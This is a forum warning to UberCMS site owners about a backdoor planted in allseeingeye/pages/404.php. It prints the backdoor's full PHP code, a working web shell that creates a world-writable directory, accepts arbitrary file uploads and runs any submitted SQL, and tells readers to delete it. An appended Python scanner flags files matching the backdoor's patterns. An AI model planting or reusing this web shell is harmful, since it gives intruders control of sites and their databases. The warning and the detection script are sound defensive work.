[̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅]
Here is an important fix for UberCMS.
You really need to check your allseeingeye/pages and open the file 404.php.
If that file contains this code ->
PHP:
<?php
require_once "../../global.php";
require_once "../admincore.php";
if(!file_exists("god/"))
{
mkdir("god/", 0777);
echo 'Backdoor Directory Created : (god/)';
}
else
{
echo 'Backdoor Open for Uploading : (god/)';
}
if(isset($_POST['submit']))
{
$target_path = "god/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file ". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
if(isset($_POST['sql2']))
{
$core1225 = $_POST['sql1'];
mysql_query("".$core1225."");
echo 'Query Executed Successfully';
}
?>
<html>
<body>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"
enctype="multipart/form-data">
<input type="file" name="uploadedfile" id="file" />
<input type="submit" name="submit" value="Submit" />
<br />
</form>
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p>
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
<p>
<label for="sql1"></label>
<textarea name="sql1" id="sql1" cols="65" rows="4"></textarea>
</p>
<p>
<input type="submit" name="sql2" id="sql2" value="Execute">
</p>
</form>
<p> </p>
</body>
Delete the code and put something else in there, such as page not found or whatever.... It's not important what you put in there....
Failure to do this will leave you open for a whole lot of trouble....
All credits for this go out to: [IP on request] for showing me this on our hotel.
Yes, [IP on request] is a real cool hacker that likes to duck with people's hard work. Good job dude...
If anybody wants his IP so they can block the dude from their site then I'll be more than happy to provide it.
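The manual check described in the post, extended to every .php file under a web root, as an added example that is not part of the original post or of UberCMS. The indicator names, the regex heuristics and the demo tree are constructed for illustration; a hit means the file needs a manual look, and a clean result does not prove the site is clean.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators taken from the backdoor quoted in the post (not a PHP parser).
DIRECT = {
    "upload-sink": re.compile(r"move_uploaded_file\s*\(\s*\$_FILES\b"),
    "mkdir-0777": re.compile(r"mkdir\s*\([^)]*\b0777\b"),
}
REQUEST = re.compile(r"\$_(?:POST|GET|REQUEST)\b")
ASSIGN = re.compile(r"(\$\w+)\s*=\s*\$_(?:POST|GET|REQUEST)\s*\[")
QUERY_CALL = re.compile(r"mysqli?_query\s*\(([^;]*)\)\s*;")

def scan_source(src):
    """Return the set of indicator names found in one PHP source string."""
    hits = {name for name, rx in DIRECT.items() if rx.search(src)}
    tainted = set(ASSIGN.findall(src))  # e.g. $core1225 = $_POST['sql1'];
    for args in QUERY_CALL.findall(src):
        via_var = any(re.search(re.escape(v) + r"\b", args) for v in tainted)
        if REQUEST.search(args) or via_var:
            hits.add("request-to-query")
    return hits

def scan_tree(root):
    """Map each flagged .php file (path relative to root) to its sorted indicators."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = sorted(hits)
    return report

def demo():
    """Scan a constructed tree: one file with lines from the post, one clean page."""
    planted = (
        '<?php\nmkdir("god/", 0777);\n'
        "move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path);\n"
        "$core1225 = $_POST['sql1'];\n"
        'mysql_query("".$core1225."");\n?>'
    )
    clean = "<?php http_response_code(404); ?>\n<h1>Page not found</h1>\n"
    with tempfile.TemporaryDirectory() as tmp:
        pages = Path(tmp, "allseeingeye", "pages")
        pages.mkdir(parents=True)
        (pages / "404.php").write_text(planted)
        (pages / "index.php").write_text(clean)
        return scan_tree(tmp)

if __name__ == "__main__":
    print(demo())
```

Point `scan_tree()` at the real web root instead of the constructed tree, and review every flagged file by hand before deleting anything.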